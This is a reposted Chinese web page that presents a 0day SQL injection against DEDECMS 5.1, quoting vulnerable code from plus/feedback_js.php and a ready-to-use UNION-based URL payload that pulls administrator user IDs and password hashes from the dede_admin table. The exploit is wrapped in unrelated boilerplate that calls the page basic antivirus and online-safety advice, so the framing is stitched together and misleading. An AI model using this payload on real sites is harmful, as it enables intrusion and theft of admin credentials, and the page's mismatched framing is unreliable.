軟件安裝：裝機軟件必備包

隨著網絡的普及，我們的生活越來越方便，但是網絡安全也成了很多人面臨的一個問題。特別是那些有著商業數據的企業電腦，更要注意上網安全常識，不然病毒會對我們造成嚴重的威脅。

作者:st0p&Rainy'Fox

同樣是在magic_quotes_gpc=off的情況下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數為$arcurl

......

$urlindex = 0;

if(empty($arcID))

{

$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");

//此處$arcurl沒有過濾

if(is_array($row)) $urlindex = $row['id'];

//存在結果則把$urlindex賦值為查詢到的$row['id'],我們可以構造SQL語句帶入下面的操作中了

}

if(empty($arcID) && empty($urlindex)) exit();

//如果$arcID為空或$urlindex為空則退出

......

if(empty($arcID)) $wq = " urlindex = '$urlindex' ";

//我們讓$arcID為空,剛才上面執行的結果就會被賦值給$wq帶入下面的操作中執行了.

else $wq = " aid='$arcID' ";

$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";

$dlist->Init();

$dlist->SetSource($querystring);

看一下利用方法吧,嘿,為了閉合我用了兩次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

javascript:contentimage(this);>

唉,偶和Rainy'Fox這家伙找目標測試的時候,他竟然說能不能在magic_quotes_gpc=on時通過....這種想法太YD了..也太可怕了,要真可以實現,這個網絡界又該亂了,好多程序都是在PHP默認magic_quotes_gpc為關閉時才會調用自身的轉義部分...要真能實現,那就是PHP程序的惡夢了...

上面是電腦上網安全的一些基礎常識，學習了安全知識，幾乎可以讓你免費電腦中毒的煩擾。

軟件推薦：

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。